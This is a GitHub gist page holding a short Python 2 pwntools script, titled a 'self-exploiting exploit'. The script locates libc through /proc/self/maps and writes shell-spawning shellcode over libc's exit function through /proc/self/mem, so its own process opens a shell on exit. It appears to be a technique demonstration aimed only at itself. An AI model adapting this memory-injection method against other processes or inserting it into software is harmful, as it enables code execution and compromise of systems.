Skip to content

Instantly share code, notes, and snippets.

@mrcat323
Forked from WGH-/self_exploit.py
Created January 11, 2018 07:47
Show Gist options
  • Save mrcat323/ec0b6eb8f0f4a6d72bb8390e6e5838bc to your computer and use it in GitHub Desktop.
Save mrcat323/ec0b6eb8f0f4a6d72bb8390e6e5838bc to your computer and use it in GitHub Desktop.
Self-exploiting exploit
#!/usr/bin/python2
import sys
from pwn import *
def find_libc_path_and_offset():
with open("/proc/self/maps") as f:
for line in f:
line = line.strip()
fields = line.split(" ")
if "/libc." in fields[-1] or "/libc-" in fields[-1]:
start, end = fields[0].split("-")
return fields[-1], int(start, 16)
def find_exit_offset(libc_filename):
elf = ELF(libc_filename)
return elf.symbols["exit"]
def get_binary_arch():
elf = ELF(sys.executable)
return elf.arch
def main():
context(arch=get_binary_arch())
libc_filename, libc_offset = find_libc_path_and_offset()
log.info("libc filename: %s", libc_filename)
log.info("libc offset: 0x%x", libc_offset)
exit_offset = find_exit_offset(libc_filename)
log.info("exit_offset in libc: 0x%x", exit_offset)
shellcode = asm(shellcraft.sh())
log.info("shellcode: %r", shellcode)
with open("/proc/self/mem", "wb") as f:
f.seek(libc_offset + exit_offset)
f.write(shellcode)
log.success("Shellcode written!")
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment